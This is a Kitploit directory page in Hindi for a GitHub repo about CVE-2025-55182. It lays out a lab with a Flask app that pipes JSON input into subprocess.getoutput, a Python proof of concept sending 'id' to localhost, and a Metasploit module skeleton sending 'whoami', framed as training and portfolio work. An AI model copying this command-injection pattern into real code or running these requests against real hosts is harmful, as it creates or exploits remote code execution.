Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-Metasploit-exploit-skeleton-real-flow- — नीचे पूर्ण LAB योजना है: demo-vulnerable app → Python PoC → Metasploit exploit skeleton | Kitploit
उपकरण/GitHubGitHub/nulltrace1336/cve-2025-55182-metasploit-exploit-skeleton-real-flow-
शोषण फ्रेमवर्कभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHubnulltrace1336/cve-2025-55182-metasploit-exploit-skeleton-real-flow-

CVE-2025-55182-Metasploit-exploit-skeleton-real-flow-

नीचे पूर्ण LAB योजना है: demo-vulnerable app → Python PoC → Metasploit exploit skeleton

रिपॉजिटरी देखें
28 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🧪 चरण 1: प्रदर्शन कमजोर वेब-ऐप (LAB)

हम CVE-2025-55182 जैसा तर्क (असुरक्षित सर्वर-साइड निष्पादन) बनाते हैं।

📁 vuln_app/app.py

root@kitploit:~
from flask import Flask, request
import subprocess

app = Flask(__name__)

@app.route("/render", methods=["POST"])
def render():
    data = request.json.get("component")

    # ❌ VULNERABLE: user input to command execution
    result = subprocess.getoutput(data)
    return result

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=3000)

चलाने के लिए:

root@kitploit:~
pip install flask
python app.py

📌 यह React2Shell जैसा है:

सर्वर-साइड इनपुट → निष्पादन

🧪 चरण 2: Python PoC (परीक्षण शोषण)

यह केवल RCE के अस्तित्व को साबित करने के लिए है।

📁 poc.py

root@kitploit:~
import requests

url = "http://127.0.0.1:3000/render"

payload = {
    "component": "id"
}

r = requests.post(url, json=payload)
print("[+] Server response:")
print(r.text)

यदि आउटपुट आता है:

root@kitploit:~
uid=1000(user) gid=1000(user)

✅ RCE की पुष्टि (LAB)

🧠 चरण 3: Metasploit शोषण SKELETON

यह पेशेवर फ्रेमवर्क प्रारूप है, लेकिन हथियारबंद नहीं है।

📁 स्थान

root@kitploit:~
~/.msf4/modules/exploits/linux/http/lab_react_like_rce.rb

📄 lab_react_like_rce.rb

root@kitploit:~
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'LAB React-like Server RCE',
      'Description' => %q{
        Demonstration exploit for unsafe server-side execution.
        Tested only in a controlled lab environment.
      },
      'Author'      => ['Behruz'],
      'License'     => MSF_LICENSE,
      'Platform'    => ['linux'],
      'Arch'        => ARCH_CMD,
      'Targets'     => [['Automatic', {}]],
      'DisclosureDate' => '2025-01-01',
      'DefaultTarget'  => 0
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Vulnerable endpoint', '/render'])
    ])
  end

  def exploit
    print_status("Sending lab command execution request")

    send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path),
      'ctype'  => 'application/json',
      'data'   => {
        'component' => 'whoami'
      }.to_json
    })

    print_good("Request sent (LAB validation only)")
  end
end

उपयोग:

root@kitploit:~
msfconsole
use exploit/linux/http/lab_react_like_rce
set RHOSTS 127.0.0.1
run

📌 यहाँ:

❌ रिवर्स शेल नहीं है

✅ फ्रेमवर्क ज्ञान + शोषण तर्क है

📁 चरण 4: पोर्टफोलियो संरचना (महत्वपूर्ण)

GitHub पर इस प्रकार दिखना चाहिए:

root@kitploit:~
lab-react-like-rce/
 ├─ vuln_app/
 │   └─ app.py
 ├─ poc/
 │   └─ poc.py
 ├─ metasploit/
 │   └─ lab_react_like_rce.rb
 ├─ README.md

📝 चरण 5: README में इस प्रकार लिखा जाता है

root@kitploit:~
## Description
This project demonstrates a lab-based server-side code execution
vulnerability inspired by modern RCE CVEs.

## Scope
- Tested only in a controlled lab environment
- No real-world systems were targeted

## Skills Demonstrated
- Vulnerability analysis
- Python PoC development
- Custom Metasploit module creation
टूल डाउनलोड करें